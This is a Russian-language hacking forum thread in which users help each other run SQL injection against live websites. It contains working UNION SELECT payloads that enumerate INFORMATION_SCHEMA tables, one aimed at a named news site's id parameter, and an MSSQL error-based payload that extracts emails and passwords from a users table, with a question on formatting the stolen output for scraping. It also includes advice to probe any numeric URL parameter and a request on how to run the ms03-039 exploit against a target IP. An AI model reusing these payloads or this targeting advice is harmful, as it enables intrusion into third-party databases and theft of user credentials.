народ подскажите плз, как такое может быть
почему не подходит?

все подходит, выводи в 3 поле..и смотри сорец страницы

ага выводит, а я на странице искал, сенкс

хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
пробовал хексить слово и потом по коду искать, но тоже ни как..
зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
но почему-то не могу к ней подключиться, ошибку пишет

туц
[/QUOTE]
Возможно скрипт работает с другой БД.Укажите в запросе имя БД
Имя базы данных:

Код:

-11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+

Зы:Может не хватать прав на доступ

Возможно скрипт работает с другой БД.Укажите в запросе имя БД
Имя базы данных:

Код:

-11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+

Зы:Может не хватать прав на доступ
спасибо) А можно немного по подробней, из=за чего не отображалось с "-" а с "999999999999" заработало? и что означает "-+&sec=2"?
____________________________________
И еще я сюда напишу сразу, может кто подскажет, я тут перечитываю заново некоторые статьи, например вот в этой https://forum.antichat.ru/thread19844.html написано, как искать подобного рода уязвимости? почти все статьи что я читаю указывают параметр "?id=" и дальше пробовать подставлять разные значения, но тоесть получается не обязательно нужен "?id=" ? но и любой параметр подойдет, например встречал "?int=" "?e=" "?i=" , с ними также пробовать подставлять, или вообще на сайте (в урле) искать любое числовое значение и пробовать менять и подставлять к нему данные?

Помоему просто мусор. Можно так.
http://asiane wsnet.net/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24/*
На счёт второго вопроса, можно и с id=, и с int= и e=, это просто другие названия переменных и не более...Моё имхо, лучше для начала сделать простенький сайтец, php+mysql+ещё что-то), желательно с нуля, после чего тебе будет всё более понятней и интересней. Ествественно в ходе создания сайта, в теории ты выучишь хотя php и mysql.. Потому как сразу без какого-то рабочего опыта, будет сложновато.

Так как там magic_quotes_gpc=on, то нулем не заменишь, разве что через /////////[...].

вопрос по скулю:

Цитата:
+and+(select+top+1+isnull(cast([email]+as+nvarchar(4000)),char(32))%2bchar(94)%2bisnull( cast([password]+as+nvarchar(4000)),char(32))+from+[jackson]..[users]+where+email+not+in+(select+top+1+email+from+[jackson]..[users]+where+1=1+order+by+[email])+)%3E0--


тут выводится в ответе email@domain.com^passmy
Возможно ли сделать запрос чтобы выдавало не email@domain.com^passmy
а !!!email@domain.com^passmy!!!
Тоесть надо добавит 0x212121 в начало и конец каждого ответа
это чтоб со страницы корректно спарсит нужно

Намекните где можно почитать, как заюзать ms03-039 и есть ли он в метасплойте. Ато в мс я его не нашел (3,2), скачал скомпилированую версию, а как заюзать хз. В cmd выдает: usage 1.exe <target_ip>
Что дальше?